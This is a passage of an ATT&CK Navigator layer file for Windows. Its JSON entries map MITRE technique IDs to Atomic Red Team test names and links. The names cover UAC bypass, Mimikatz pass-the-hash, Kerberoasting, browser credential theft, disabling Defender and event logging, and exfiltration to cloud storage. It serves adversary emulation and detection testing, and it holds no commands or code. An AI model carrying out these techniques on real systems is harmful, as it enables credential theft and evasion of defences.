Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":58,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View 